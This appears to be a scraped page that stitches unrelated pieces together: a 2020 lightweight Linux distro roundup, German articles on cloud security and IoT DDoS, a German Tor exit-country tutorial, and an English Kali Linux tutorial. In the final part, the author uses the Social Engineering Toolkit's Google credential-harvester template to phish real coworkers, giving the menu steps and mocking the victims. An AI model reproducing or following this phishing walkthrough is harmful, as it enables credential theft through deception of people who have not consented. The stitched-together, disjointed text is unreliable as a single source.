Best lightweight Linux distro of 2020

Modern Linux distros are designed to appeal to a large number of users who run modern hardware.

As a result, they have become too bloated for older machines, even if you manually delete files. Without a healthy dollop of system memory and an extra core or two, these distros may not deliver the best performance.

Thankfully, there are many lightweight distros, trimmed and tweaked by expert hands, which can be used to breathe new life into older hardware.

But there’s one caveat to bear in mind when working with lightweight distros – they usually manage to support ancient kit by cutting away just about everything you take for granted, such as wizards and scripts which make everyday tasks easier.

That said, these lightweight distros are fully capable of reviving older hardware and can even function as a replacement of your current operating system, if you’re willing to adjust to their way of working and install extra programs as necessary.

Absolute Linux
Image credit: Absolute Linux

1. Absolute Linux

A featherweight distro designed for desktop useEasy to configureHighly streamlined and nimble distroPlenty of help documentation on hand

Absolute Linux is a lightweight distro designed for desktop use, and as such comes preinstalled with the Firefox browser and LibreOffice suite. It’s based on Slackware 14.2 but unlike its parent OS, aims to make configuration and maintenance as simple as possible.

New versions of Absolute Linux are released roughly once a year. The most recent version (15.0) was made available for download in February 2018. It’s available as a 2GB ISO for 64-bit computers. The OS is still in the beta testing stage so may perform a little unpredictably, as ever with beta software. Whichever version you choose, there’s a massive selection of lightweight applications available. 

The installer is text-based so there’s no Live mode, but nevertheless it’s incredibly simple to follow. The way Absolute is structured also means that you can add and remove packages from the install media to create a distro which truly suits you, though you’ll need some time and experience with Linux if you really want to make the most of this feature. 

Once installed, Absolute Linux is incredibly nimble. This is ensured through the lightweight IceWM window manager, along with popular apps such as LibreOffice, making this OS perfect for older machines. There’s also plenty of documentation accessible from within the desktop itself to assist new users.

best lightweight Linux distro
TinyCore
Image credit: TinyCore

2. TinyCore

Tiny by name, and most certainly tiny by nature…Incredibly compact distroThree choices of sizeIt’s unsurprisingly barebones

The Core Project offers up the tiniest of Linux distros, shipping three variants on which you can build your own environments. The lightest edition is Core, weighing in at just 11MB, which comes without a graphical desktop – but you can always add one after installation. 

If that’s too intimidating, try TinyCore (currently v9.0). The OS is only 16MB in size and offers a choice of FLTK or FLWM graphical desktop environments. 

You can also choose to install CorePlus, which measures a relatively hefty 106MB. This spin offers a choice of lightweight window managers such as IceWM and FluxBox. CorePlus also includes support for Wi-Fi and non-US keyboards.  

TinyCore saves on size by requiring a wired network connection during initial setup. The recommended amount of RAM is just 128MB. There are 32-bit and 64-bit versions as well as PiCore, which is a build for ARM devices like the Raspberry Pi

This minimalist distro doesn’t feature many apps. After installation there’s little beyond the Terminal, a basic text editor and a network connection manager. The Control Panel provides quick access to the different configurable parts of the distro such as display, mouse, network, etc. Use the graphical package manager ‚Apps‘ to install additional software such as multimedia codecs.

best lightweight Linux distro
Lubuntu
Image credit: Lubuntu

3. Lubuntu

A neat spin on the popular OS for older machinesUbuntu but slimmed downUses nifty lightweight appsCompatible with Ubuntu repositories

The ‚L‘ in Lubuntu stands for lightweight, and it unashamedly appeals to those Ubuntu users who are looking for an OS which requires fewer resources than most modern distros, but doesn’t force you to compromise on your favourite apps.

Lubuntu is primarily designed for older machines. The default desktop is based on LXQt, which is far less resource hungry than mainstream Ubuntu’s Gnome 3 desktop. It comes with a plethora of office, internet, multimedia and graphics apps, along with a wide assortment of useful tools and utilities. 

As a lightweight distro, Lubuntu focuses on being fast and energy efficient. It features alternative and less resource intensive apps where possible. The most recent releases have also reverted back to using LibreOffice rather than Abiword for word processing.

This doesn’t mean that Lubuntu is lacking, though: it’s based on Linux Kernel 5.00 and Ubuntu 18.04, so it’s a proper modern Linux distro – it’s just shed all unnecessary weight, in the manner of a rally car having all but one of its seats removed.

The most recent release of Lubuntu (19.04 – Disco Dingo) has now lowered the minimum required RAM to run the OS to 500MB. However, to ensure smooth running, try to use a machine with at least 1GB of RAM. It’s available in 32-bit and 64-bit incarnations.

The unique selling point of Lubuntu is its compatibility with Ubuntu repositories, which gives users access to thousands of additional packages that can be easily installed using the Lubuntu Software Center.

best lightweight Linux distro
LXLE
Image credit: LXLE

4. LXLE

A lightweight spin on Ubuntu LTSEmphasizes stability and supportGood-looking distroImpressive range of apps

LXLE is a lightweight version of Linux based on the annual Ubuntu LTS (long term support) release. Like Lubuntu, LXLE uses the barebones LXDE desktop environment, but as LTS releases are supported for five years, it emphasises stability and long-term hardware support. The most recent version at the time of writing (16.04.4) is a remaster of the current of version of Ubuntu LTS.

Aimed primarily at reviving older machines, the distro is designed to serve as a ready to use desktop out of the box, specifically tailored to appeal to existing Windows users.

The developers spend a considerable amount of time making all the necessary mods and tweaks to improve performance, but they don’t skimp on niceties. Aesthetics are a key area of focus as evidenced by the hundred wallpapers which are included, along with clones of Windows functions like Aero Snap and Expose.

The distro boasts full featured apps across categories such as internet, sound and video, graphics, office, games, and more. It also includes plenty of useful accessories such as a Terminal-based Weather app and Penguin Pills, which is a graphical frontend for several virus scanners.

Like Lubuntu, LXLE is available as a Live image for 32-bit and 64-bit machines. The hardware requirements are 512MB of system RAM at a minimum, with 1GB recommended.

best lightweight Linux distro
Damn Small Linux
Image credit: Damn Small Linux

5. Damn Small Linux

This compact OS will even run on an old 486 PCOnly needs 16MB of RAM to runHas lots of pre-installed tools despite sizeLast stable version is very old

Damn Small Linux (DSL) lives up to its name in that the install image is barely 50MB. It’s designed specifically for x86 PCs and will run on an ancient 486 CPU with 16MB of RAM. This means it can run fully inside your system memory which can result in phenomenally fast speeds. 

DSL is usually run from a USB or CD, or you can do a Debian-style installation to a hard drive if you prefer.

Despite the extremely minimal desktop, you may be surprised at the vast array of tools that come preinstalled. You can surf the web with a choice of three browsers – Dillo, Firefox or the text-based browser Netrik. You can also examine office documents using the Ted word processor and check your email with the minimal Slypheed client. Or indeed sort through your data with the ultra-tiny emelFM file manager.

The latest stable version of DSL (4.4.10) was released in 2008. However, you can update and add new applications using the MyDSL Extension Tool.

best lightweight Linux distro
Porteus
Image credit: Porteus

6. Porteus

Slackware-based distro is incredibly fast and streamlinedCan run direct from system RAMNeat choice of desktop environmentsCan no longer build own custom ISO

This Slackware-based distro is designed to be completely portable and run on removable media such as a USB stick or CD, but can just as easily be installed to a hard disk. The distro is incredibly fast as it’s small enough to run entirely from system RAM. 

The unique selling point of Porteus is that it exists in a compressed state (less than 300MB for the Cinammon and MATE editions) and creates the file system on-the-fly. Besides the preinstalled apps, all additional software for the distro comes in the form of modules, making the OS very small and compact. 

Porteus is available for 32-bit and 64-bit machines. The distro provides users with the choice of KDE, MATE, Cinnamon, Xfce and LXDE desktop environments when downloading the ISO image.

Unfortunately the option to build your own custom ISO has been removed since we previously looked at Porteus, but the pre-built images offer a decent selection of software and drivers, as well as an excellent selection of tutorials to help you get started.

best lightweight Linux distro
Vector Linux
Image credit: Vector Linux

7. Vector Linux

Keeping things simple and small…Highly flexible distroSuitable for home desktop or office serverAvailable in two variants

This distro’s credo is ‚keep it simple, keep it small‘, and it manages this to great effect. It allows users to mould the distro to serve just about any possible purpose – Vector Linux can be a lightning-fast desktop for home users, and can just as easily be used for running servers, or as the gateway for your office computer.

After a lengthy period, Vector Linux 7.1 was finally officially released in July 2015, and now comes in two flavours: Light and Standard. The difference is in the desktop environment used. Vector Linux Light uses the ultra-efficient IceWM for the desktop environment while the Standard version is powered by Xfce.

This Slackware-based distro tends to favour GTK+ apps such as Pidgin Messenger, but you can use the TXZ package manager to fetch and install additional software.

best lightweight Linux distro
Puppy Linux
Image credit: Puppy Linux

8. Puppy Linux

One of the veterans of the lightweight Linux worldHuge range of appsDifferent versions for differing needsXenialPup edition works with Ubuntu repositories

Puppy Linux is one of the oldest lightweight distros out there. The project has been turning out slim, sleek and fast distros for 15 years now, and offers different versions depending on the underlying environment. Puppy Linux 8.0 (Bionic Pup) is based on Ubuntu Bionic Beaver (18.04).

Puppy Linux developer, Barry Kauler, also manages a sister project named Quirky, a version of Puppy Linux built using the custom tool Woof-CE.

The distro is full of apps, belying its small size – some are quite unconventional, such as Homebank which helps you manage your finances, or Gwhere which is for cataloguing disks. There are also graphical tools to manage Samba shares and set up a firewall, for example. The sheer variety of applications is impressive.

The Bionic Pup edition of Puppy Linux is compatible with Ubuntu’s repositories, giving users access to the parent distro’s vast software collection. The handy QuickPet utility can be used to install some of the most popular apps.

best lightweight Linux distro
Linux Lite
Image credit: Linux Lite

9. Linux Lite

Designed for those who won’t pay for a new version of WindowsAimed at easing migration of Windows usersFeatures a host of familiar appsNot the least demanding distro out there

Linux Lite is based on Ubuntu (currently Long Term Support version 18.04). It is specifically developed to ease Windows users – particularly those with old machines running Windows XP – into the world of Linux.

It features familiar tools like Firefox (with built-in support for Netflix), plus VLC Media Player and LibreOffice are preinstalled. The OS also includes the zRAM memory compression tool which makes it run faster on older machines. There’s also a special ‘Lite Upgrade’ utility.

Despite its name, this distribution isn’t the least resource hungry out there, as it requires both a 1.5GHz processor and at least 1GB of RAM to run smoothly. That said, this shouldn’t be too much to ask of any computer made in the last decade. 

Try it on modern hardware and you’ll be amazed at just how quickly it runs. Linux Lite can boot from a Live medium such as a USB stick or CD, or install to your hard drive. It also supports multi-booting so you can keep your existing OS if you wish. The distro is available for both 32-bit and 64-bit systems.

best lightweight Linux distro
BunsenLabs
Image credit: BunsenLabs

10. BunsenLabs

A distro that’s carrying the Crunchbang torch onwardsBlazing fast performanceSmartly configured Openbox window manager 

Crunchbang (or #!) was a very popular Debian-derived distro specifically designed to use as few system resources as possible. While it was discontinued in 2013, the community fondly remembered its lightning speed and responded with two Crunchbang-based distros to continue its legacy.

However, one of those successors, Crunchbang++, has now been discontinued. BunsenLabs is still active, though, and its current release (Helium) is based on the latest stable version of Debian featuring a gorgeously configured Openbox window manager and its own repository of core packages.

There’s also a point release option, which is regularly updated if you want to stay on the bleeding-edge. It requires at least 256MB of RAM to run (with 1GB or more recommended). 

  • You can download BunsenLabs here
  • Linux Format is the number one magazine to boost your knowledge on Linux, open source developments, distro releases and much more. Subscribe to the print or digital version of Linux Format here

Cloud-Lösungen und mobile Mitarbeiter Warum sind mobile Mitarbeiter eine Cyber-Bedrohung?

Telearbeit und Homeoffice sind seit mehr als einem Jahrzehnt auf dem Vormarsch. Laut Bitkom-Studie bietet mittlerweile jedes dritte Unternehmen seinen Mitarbeitern die Möglichkeit zur Arbeit von zuhause aus an – Tendenz steigend.

Ein flexibler Arbeitsplatz bietet mehrere Vorteile – das schwache Glied ist dabei jedoch die Cloud-Sicherheit, die Unternehmen gefährden kann. Laut dem Netwrix Cloud Data Security Report 2019 verzeichneten 38 Prozent der Unternehmen, die mobile Mitarbeiter beschäftigen, Verstöße gegen die Cloud-Datensicherheit. Damit liegt die Zahl doppelt so hoch wie bei eher traditionellen Unternehmen, die nur Mitarbeiter am Standort beschäftigen.

Wer ist ein mobiler Mitarbeiter?

Der Begriff mobile Mitarbeiter ist nicht auf Selbständige und Auftragnehmer beschränkt. Heutzutage arbeiten manche Mitarbeiter jeden Tag von zu Hause oder einem anderen Ort aus und melden sich gelegentlich, wenn nötig, im Unternehmensnetzwerk an (zum Beispiel während einer Geschäftsreise oder an einem Krankheitstag).

Warum stellen mobile Mitarbeiter eine Cyber-Bedrohung dar?

Mobile Mitarbeiter melden sich in ihrem Unternehmensnetzwerk häufig von ihren eigenen Geräten aus an, die mit hoher Wahrscheinlichkeit Sicherheitslücken aufweisen. Beispielsweise ist es kaum oder gar nicht möglich zu gewährleisten, dass diese Geräte frei von schädlicher Software sind und ordnungsgemäß gepatcht wurden. Darüber hinaus können Unternehmen weniger schnell reagieren, wenn ein mobiler Nutzer einen Fehler macht, der zu unbefugtem Datenzugriff oder sogar zu Datenkompromittierungen führt. Solche Fehler sind zu teuer, als dass man sie ignorieren könnte: Die 2019 vom Ponemon Institute durchgeführte Studie „Cost of Data Breach“ ergab, dass 24 Prozent aller Datenverletzungen auf menschliches Versagen zurückzuführen sind, wobei die Gesamtkosten eines Datenverstoßes circa 120 Euro pro Datensatz betragen. Zu den Kosten zählen sowohl direkte finanzielle Auswirkungen (beispielsweise Geldstrafen bei Compliance-Verstößen und Rechtsstreitigkeiten) als auch indirekte Kosten, die durch eine Reputationsschäden verursacht werden, zum Beispiel durch den Verlust der Kundenbindung und des Markenwerts.

Wie können Sie diese Bedrohungen minimieren?

Die ordnungsgemäße Führung mobiler Mitarbeiter ist unmöglich, wenn nicht genau bekannt ist, was diese in der Cloud-Umgebung des Unternehmens tun. Insbesondere ist ein tiefer Einblick in die Nutzeraktivitäten und in die Firmendaten erforderlich.

Einblick in Nutzeraktivitäten

Durch den Einblick, wer was wo und wann tut, kann verdächtiges Verhalten schnell erkannt werden. Zudem kann die IT-Sicherheit rechtzeitig reagieren, bevor es zum Datenverstoß kommt. Darüber hinaus können Vorfälle gründlich untersucht werden, um zu gewährleisten, dass sie nicht noch einmal auftreten. Ein weiterer Vorteil ist, dass Prüfern auf Nachfrage ein Nachweis der Einhaltung gesetzlicher Vorschriften vorgelegt werden kann. Viele Unternehmen haben immer noch nicht genügend Einblick in die Nutzeraktivitäten: 59 Prozent der von Netwrix befragten Unternehmen, die mobile Mitarbeiter beschäftigen, waren nicht in der Lage, die Bedrohungsakteure hinter den Sicherheitsvorfällen in der Cloud zu ermitteln.

Mit einer Softwarelösung, die eine kontinuierliche Überwachung der Nutzeraktivitäten sowie Echtzeitwarnungen bietet, können Sicherheitsverantwortliche Bedrohungen sofort erkennen, detaillierte Untersuchungen durchführen und Compliance-Audits bestehen.

Einblick in Daten

Mit der Cloud ist das Teilen von Daten leichter denn je. Wenn genau ist, welche Daten vorhanden sind, wo sie sich befinden, welche Daten am vertraulichsten sind und wer Zugriff darauf hat, können die Sicherheitsmaßnahmen sich auf die kritischsten oder vertraulichsten Informationen, wie personenbezogene Daten von Kunden und Mitarbeitern, konzentrieren. Wenn nicht bekannt ist, wo sich vertrauliche Daten befinden, ist es unmöglich, sich mit bewährten Sicherheitsmethoden und entsprechend gesetzlicher Bestimmungen entsprechend schützen.

Mithilfe einer Datenerkennungs- und -klassifizierungslösung können Unternehmen ihre vertraulichen Daten lokalisieren und die entsprechenden Kontrollen anwenden. Wer all seine Daten klassifiziert, erlebt mit einer 5-mal geringeren Wahrscheinlichkeit einen Datenverstoß als diejenigen, die darauf verzichten.

Darüber hinaus ist mithilfe der Erkennung und Klassifizierung von Daten möglich, redundante, obsolete und triviale Daten (ROT) identifizieren. Durch die Bereinigung werden die Kosten für die Datenverwaltung und -speicherung gesenkt und die Produktivität gesteigert, da die Benutzer die benötigten Informationen leichter finden können.

Wie kann Sichtbarkeit das Geschäft ankurbeln?

Der Einblick in ihre Cloud-Umgebungen bietet Unternehmen auch langfristig enorme Vorteile. Zunächst kann das Engagement für den Datenschutz unter Beweis gestellt werden, sobald sie in der Lage sind, die persönlichen Daten ihrer Kunden sicher zu speichern und auf das Verlangen, vergessen zu werden, umgehend zu reagieren. Die daraus resultierende Kundenbindung ist ein klarer Wettbewerbsvorteil.

Durch den Einblick in die Daten und die damit zusammenhängenden Nutzeraktivitäten kann man außerdem den Zeit- und Ressourcenaufwand für die Compliance minimieren und hohe Bußgelder vermeiden. Laut einer Studie von Precise Security, beliefen sich Jahr 2019 sich die Strafen, die im Zuge der DSGVO gezahlt werden mussten, auf insgesamt über 402 Millionen Euro, wobei die höchste Strafzahlung in Deutschland bei der Deutschen Wohnen mit 14,5 Millionen Euro lag. Unternehmen sollten deshalb sicherstellen, dass ihre Daten in der Cloud zu jeder Zeit richtig klassifiziert und vor unberechtigtem Zugriff geschützt sind.

Über den Autor: Jürgen Venhorst ist Country Manager DACH bei Netwrix.

Im Tor Browser ein bestimmtes Land einstellen

In diesem Tutorial zeigen ich dir, wie du ein benutzerdefiniertes Entry- und Exit-Land im Tor-Browser für Computer einstellst. Dadurch verwendet Tor bestimmte Server in anderen Ländern, so dass du Web-Einschränkungen in deiner eigenen Region umgehen kannst. Denke daran, dass nicht alle Länder dir die Nutzung von Tor erlauben, was bedeutet, dass bestimmte Länder bei den Entry- und Exit-Optionen nicht funktionieren.

Methode1Unter Windows

  1. Stelle sicher, dass du Tor mindestens einmal ausgeführt hast. Damit die „torrc“-Datei — die Datei, die die Präferenz für den Exit-Knoten von Tor bestimmt — angezeigt wird, musst du Tor mindestens einmal auf deinem Computer ausführen.
    • Du kannst dafür einfach einen Doppelklick auf das Tor-Icon machen und dann auf Verbinden klicken.
  2. Öffne den Tor-Ordner. Gehe zu dem Ordner, in dem du Tor installiert hast, und mache dann zum Öffnen einen Doppelklick darauf.
  3. Finde die „torrc“ Datei. Du kannst so im Installationsordner von Tor an die Stelle navigieren, an der sich die Datei „torrc“ befindet:
    • Mache einen Doppelklick auf den Ordner Browser.
    • Mache einen Doppelklick auf den Ordner TorBrowser.
    • Mache einen Doppelklick auf den Ordner Daten.
    • Mache einen Doppelklick auf den Ordner Tor.
  4. Öffne „torrc“ mit Notepad. Mache einen Doppelklick auf die „torrc“ Datei, klicke im sich öffnenden Fenster „Öffnen mit“ auf Notepad und klicke dann auf Öffnen. Dies ermöglicht dir, den Text der Datei zu ändern.
  5. Füge die Zeile „EntryNodes“ hinzu. Setze den Cursor unter die letzte Textzeile im Dokument und tippe dann EntryNodes {} StrictNodes 1 ein und drücke auf ↵ Enter.[1]
  6. Füge die Zeile „ExitNodes“ hinzu. Tippe ExitNodes {} StrictNodes 1 ein und drücke auf ↵ Enter.
  7. Finde die Codes für dein Entry- und Exit-Land. Gehe auf deinem Computer im Browser auf https://web.archive.org/web/20180328074444/http://www.b3rn3d.com/blog/2014/03/05/tor-country-codes, scrolle nach unten zur Überschrift „Liste der Ländercodes für Tor“ und suche nach den Codes für die Länder, die du als Entry- und Exit-Knoten nutzen möchtest.
    • Wenn du bspw. möchtest, dass deine Internet-Session mit Tor in Kanada beginnt und in Uganda endet, würdest du den Ländercode von Kanada „Canada“ (ca) und „Uganda“ (ug) suchen.
  8. Gib die Entry- und Exit-Ländercodes ein. Tippe den Code für das Land, in dem deine Sitzung beginnen soll, zwischen die {} Klammern rechts neben der Zeile „EntryNodes“ ein, wiederhole dies dann mit dem Exit-Land und der Zeile „ExitNodes“. Um bspw. in Kanada zu beginnen und in Uganda zu enden, würden deine Zeilen so aussehen:
    • EntryNodes {ca} StrictNodes1
    • ExitNodes {ug} StrictNodes1
  9. Erwäge das Deaktivieren von „strict nodes“. Du kannst dafür StrictNodes 1 durch StrictNodes 0 ersetzen, was sicherstellt, dass Tor noch andere Ländercodes nutzen kann, wenn die angegebenen nicht funktionieren.
  10. Füge einem „strict node“ mehrere Länderoptionen hinzu. Wenn du die strict nodes für dein Entry- und/oder Exit-Land beibehalten möchtest, dann erwäge das Hinzufügen von mehreren Ländercodes, statt nur ein Land zu verwenden. Du kannst Länder hinzufügen, indem du weitere Ländercodes in die Klammern einfügst. Trenne die einzelnen Einträge dabei mit Kommas. Um bspw. der Zeile mit „ExitNodes“ in Uganda die Länder USA und Frankreich hinzuzufügen, würde deine Zeile so aussehen:
    • ExitNodes {ug},{us},{fr} StrictNodes 1
      • Achte darauf, dass sich zwischen den Ländern in Klammern kein Leerzeichen befindet.
  11. Ersetze die ursprüngliche „torrc“ Datei durch die gerade aktualisierte. Dies stellt sicher, dass die Ländereinstellungen für deinen Tor-Browser gespeichert sind:
    • Klicke auf Datei
    • Klicke auf Speichern als
    • Klicke auf das Dropdown-Feld „Speichern als Typ“ und klicke dann auf Alle Dateien
    • Klicke im Hauptfenster zur Auswahl auf die Datei „torrc“
    • Klicke auf Speichern
    • Klicke auf Ja
  12. Öffne Tor. Es kann sein, dass Tor dieses Mal geringfügig länger braucht zum Starten, vor allem wenn du ein weit entferntes Land gewählt hast.
  13. Überprüfe die Entry- und Exit-Knoten deines Circuits. Gehe in Tor auf eine beliebige Website, bspw. auf https://www.google.com/ und klicke dann auf das zwiebelförmige Icon links oben auf der Seite. Ein Dropdown-Menü mit der Überschrift „Tor-Circuit für diese Seite“ wird angezeigt, mit deinem Browser, dem Entry-Knoten, den Verbindungen in der Mitte, dem Exit-Knoten und dem Internet, von oben nach unten.
    • Im Beispiel dieser Methode würdest du dies sehen: Dieser Browser > Kanada [IP-Adresse] > [Land] [IP-Addresse] > Uganda [IP-Adresse] > Internet.

DDoS-Angriffe aus dem Internet der Dinge IoT als Schlaraffenland für Cyberkriminelle

Die Präsenz von IoT-Geräten im Internet nimmt weiter in rasantem Tempo zu – sehr zur Freude der organisierten Cyberkriminalität. Denn diese sieht in den erwarteten 20,4 Milliarden Endgeräten, die voraussichtlich bis zum Ende des Jahres 2020 mit dem Internet verbunden sein werden, eine auf dem Silbertablett servierte Cash Cow.

Es sind nicht nur die privat genutzten intelligenten Uhren, Tablets, Haussteuerungsgeräte, Smart Toys und Autos, die weltweit millionenfach zum Einsatz kommen und deren Sicherheitsfunktionen oft noch nicht ausgereift sind. Auch in vielen Branchen sind Geschäftsmodelle ohne das Internet der Dinge kaum mehr denkbar.

Für die Betreiber von Botnets eröffnet sich so ein reichhaltiges Angebot an Systemen, die geeignet sind, ihren Teil zur nächsten DDoS-Attacke beizutragen. Cybercrime ist heute Mainstream: Studenten können Botnets mieten, um Testplattformen abzuschalten. Nationalstaaten nutzen digitale Waffen für geopolitische Auseinandersetzungen. Bestens ausgebildete Gruppen agieren gemeinsam über Ländergrenzen hinweg und verfolgen bei ihren Datendiebstählen und DoS-Attacken ausschließlich die Gewinnmaximierung.

Das Ausmaß der Bedrohung wird deutlich, wenn man den von Netscout veröffentlichen „Threat Intelligence Report“ für das zweite Halbjahr 2019 aufschlägt. Die Security-Spezialisten überwachen bereits seit 2007 die Entwicklung der Angriffe auf digitale Infrastrukturen, wobei das Active Threat Level Analysis System (ATLAS) Daten aus realen Angriffen und Angriffsversuchen auf Basis von originärer Forschungs- und Infrastrukturdaten sowie aus der automatisierten Malware-Analyse-Pipelines, Sinkholes, Scanner und Honeypots sammelt, analysiert, priorisiert und konsolidiert.

Mit dem IoT boomt auch Mirai

Dem Report zufolge wurde in der zweiten Hälfte des Jahres 2019 ein signifikanter Anstieg von IoT-basierter Malware beobachtet, die größtenteils aus Mirai-Varianten besteht. Waren in 2017 noch rund 35.000 Mirai-Samples identifiziert worden, so lag diese Zahl in 2019 bereits bei mehr als 225.000, die auf 17 unterschiedliche Systemarchitekturen zugeschnitten sind. Dabei zielen die erfolgreichen Angriffe nicht nur darauf ab, sensitive Daten zu entwenden, vielmehr werden kompromittierte Geräte in Botnets integriert. Die Folge sind vermehrte Distributed Denial of Service (DDoS)-Angriffe auf Services, Anwendungen und mobile Netzwerke.

Insgesamt wurden in 2019 rund 8,4 Millionen DDoS-Attacken verzeichnet – dies sind mehr als 23.000 Angriffe pro Tag oder 16 pro Minute. In zwei Dritteln der Fälle waren Unternehmen dabei das Ziel. Gegenüber dem Vergleichszeitraum 2018 stieg die Zahl der Angriffe in der zweiten Hälfte 2019 um stattliche 87 Prozent, wobei der größte abgewehrte Angriff ein Maximalvolumen von 622 Gbit/s erreichte.

Insbesondere die Anbieter von Mobilnetzwerken erlebten im zweiten Halbjahr 2019 einen Anstieg der DDoS-Angriffsfrequenz um 64 Prozent gegenüber des gleichen Zeitraums 2018. Dies war hauptsächlich auf die zunehmende Tendenz zurückzuführen, mobile Geräte als drahtlosen Hotspot zu nutzen. Auch die Beliebtheit von Spielen auf mobilen Geräten mit 4G-Konnektivität trug zu diesem Wachstum bei. Bei der Satellitentelekommunikation verzeichnete man sogar einen Anstieg der Angriffszahl um 295 Prozent. Service Provider berichteten über eine 52-prozentige Zunahme bei den DDoS-Attacken auf öffentlich zugängliche Service-Infrastrukturen, im Vorjahr lag dieser Wert noch bei 38 Prozent.

DDoS als Dienstleistung

Die deutliche Steigerung der DDoS-Angriffszahlen lässt unter anderem den Rückschluss zu, dass sich das Geschäftsmodell DDoS-for-Hire erfolgreich etabliert hat. Dabei stellen DDoS-Profis gegen Entgelt ihre Expertise für Interessierte zur Verfügung, um für den Auftraggeber missliebige Websites in die Knie zu zwingen. Mittlerweile haben diese DDoS-Dienstleister ihre Position als Start-Ups verlassen und arbeiten bei der Monetarisierung ihrer Leistungen so effizient, dass es lediglich fünf Tage dauern kann, bis ein gewünschtes Angriffsziel unter Dauerfeuer genommen wird. Um die notwendige Zahl an Verbindungsanfragen zu generieren, haben kompromittierte IoT-Geräte mittlerweile eine Hauptrolle übernommen. Aktuell zeichnet sich der Trend deutlich ab, auch IoT-Geräte hinter Firewalls anzugreifen, da diese als großzügige Bandbreitenspender erkannt worden sind: Die Zahl der hinter Firewalls befindlichen IoT-Geräte ist 20-mal höher als die der direkt mit dem Internet verbundenen.

Durch neue Angriffsvektoren, den Missbrauch mobiler Hotspots und das gezielte Anpeilen kompromittierter IoT-Endgeräte finden Angreifer hierfür zunehmend erfolgversprechende Wege. Dabei ist auffällig, dass Angreifer meist sparsam mit ihrer Munition umgehen und pro Attacke nur einen kleinen Teil der verfügbaren kompromittierten Geräte nutzen. So kam beim größten von Netscout beobachteten Angriff weniger als ein Prozent der verfügbaren Reflektoren zum Einsatz. Auch in den meisten anderen beobachteten Fällen wurden weniger als drei Prozent der verfügbaren Ressourcen in diesem Angriffsvektor verwendet.

In der Studie ausgeführt ist auch die kontinuierlich steigende Anzahl der Aktivitäten durch staatlich unterstützte Cyberkriminelle, die im Auftrag von Interessengruppen oder Regierungen digitale Ziele attackieren, wobei Unternehmen, internationale Organisationen oder auch NGOs im Fadenkreuz stehen. Dabei kommen Cybertaktiken zum Einsatz, die von Malware- und DDoS-Angriffen bis hin zum Social Engineering reichen. Die ausführenden Advanced Persistent Threats (APT)-Gruppen erhalten dabei nicht nur ihre finanzielle Grundlage vom Staat, sondern können für ihre Attacken häufig auch auf Spitzentechnologien zurückgreifen.

Über den Autor: Kirill Kasavchenko ist Principal Security Technologist, CTO Office bei Netscout.

Sicherheits-Abc für Windows

Sicherheit ist nicht ein Vorschlaghammer, mit dem Sie der Gefahr einfach eins auf den Schädel geben. Denn die Gefahr ist nicht ein grosser, einzelner Gegner. Vielmehr verhalten sich Sicherheit und Gefahr wie ein Fischernetz von Tools und Techniken und ein Schwarm Piranhas. Sorgen Sie dafür, dass Ihr Netz eng genug ist, damit Sie alle Bedrohungen fangen, bevor sie auf dem PC landen.

Kali Linux: Social Engineering Toolkit

Humans are the best resource and end-point of security vulnerabilities ever. Social Engineering is a kind of attack targeting human behavior by manipulating and playing with their trust, with the aim to gain confidential information, such as banking account, social media, email, even access to target computer.  No system is safe, because the system is made by humans.The most common attack vector using social engineering attacks is spread phishing through email spamming. They target a victim who has a financial account such as banking or credit card information.

Social engineering attacks are not breaking into a system directly, instead it is using human social interaction and the attacker is dealing with the victim directly.

Do you remember Kevin Mitnick? The Social Engineering legend of the old era. In most of his attack methods, he used to trick victims into believing that he holds the system authority. You might have seen his Social Engineering Attack demo video on YouTube. Look at it!

In this post i am going to show you the simple scenario of how to implement Social Engineering Attack in daily life. It is so easy, just follow along the tutorial carefully. I will explain the scenario clearly.

Social Engineering Attack to gain email access

Goal: Gaining email credential account information

Attacker: Me

Target: My friend. (Really? yes)

Device: Computer or laptop running Kali Linux. And my mobile phone!

Environment: Office (at work)

Tool: Social Engineering Toolkit (SET)

So, based on the scenario above you can imagine that we don’t even need the victim’s device, i used my laptop and my phone. I only need his head and trust, and stupidity too! Because, you know, human stupidity can not be patched, seriously!

In this case we first are going to setup phishing Gmail Account login page in my Kali Linux, and use my phone to be a trigger device. Why i used my phone? I will explain below, later.

Fortunately we are not gonna install any tools, our Kali Linux machine has pre-installed SET (Social Engineering Toolkit), That’s all we need. Oh yeah, if you don’t know what is SET is, i will give you the background on this toolkit.

Social Engineering Toolkit, is design to perform human-side penetration test. SET (shortly) is developed by the founder of TrustedSec (https://www.trustedsec.com/social-engineer-toolkit-set/), which is written in Python, and it is open source.

Alright that was enough let’s do the practice. Before we conduct the social engineering attack, we need to set up our phising page first. Here, i am sitting down on my desk, my computer (running Kali Linux) is connected to the internet the same Wi-Fi network as my mobile phone (i am using android).

STEP 1. SETUP PHISING PAGE

Setoolkit is using Command Line interface, so don’t expect ‘clicky-clicky’ of things here. Open up terminal and type:~# setoolkit

You will see the welcome page at the top and the attack options at the bottom, you should see something like this.

Yes, of course, we are going to perform Social Engineering Attacks, so choose number and hit ENTER.

And then you will be displayed the next options, and choose number 2. Website Attack Vectors. Hit ENTER.

Next, we choose number 3. Credential Harvester Attack Method. Hit Enter.

Further options are narrower, SET has pre-formatted phising page of popular websites, such Google, Yahoo, Twitter and Facebook. Now choose number 1. Web Templates.

Because, my Kali Linux PC and my mobile phone were in the same Wi-Fi network, so just input the attacker (my PC) local IP address. And hit ENTER.

PS: To check your device IP address, type: ‘ifconfig’

Alright so far, we have set our method and the listener IP address. In this options listed pre-defined web phising templates as i mentioned above. Because we aimed Google account page, so we choose number 2. Google. Hit ENTER.

the

Now, SET starts my Kali Linux Webserver on port 80, with the fake Google account login page. Our setup is done. Now i am ready walking into my friends room to login into this phishing page using my mobile phone.

STEP 2. HUNTING VICTIMS

The reason why i am using mobile phone (android)? Let see how the page displayed in my built-in android browser. So, i am accessing my Kali Linux webserver on 192.168.43.99 in the browser. And here is the page:

See? It looks so real, there are no security issues displayed on it. The URL bar showing the title instead the URL itself. We know the stupid will recognize this as the original Google page.

So, i bring my mobile phone, and walk into my friend, and talk to him as if i failed to login to Google and act if I am wondering if Google crashed or errored. I give my phone and ask him to try to login using his account. He doesn’t believe my words and immediately begins typing in his account information as if nothing will happen badly here. Haha.

He already typed all the required forms, and let me to click the Sign in button. I click the button… Now It is loading… And then we got Google search engine main page like this.

PS: Once the victim clicks the Sign in button, it will send the authentication information to our listener machine, and it is logged.

Nothing is happening, i tell him, the Sign In button is still there, you failed to login though. And then i am opening again the phising page, while another friend of this stupid coming to us. Nah, we got another victim.

Until i cut the talk, then i go back to my desk and check the log of my SET. And here we got,

Goccha… I pwnd you!!!

In conclusion

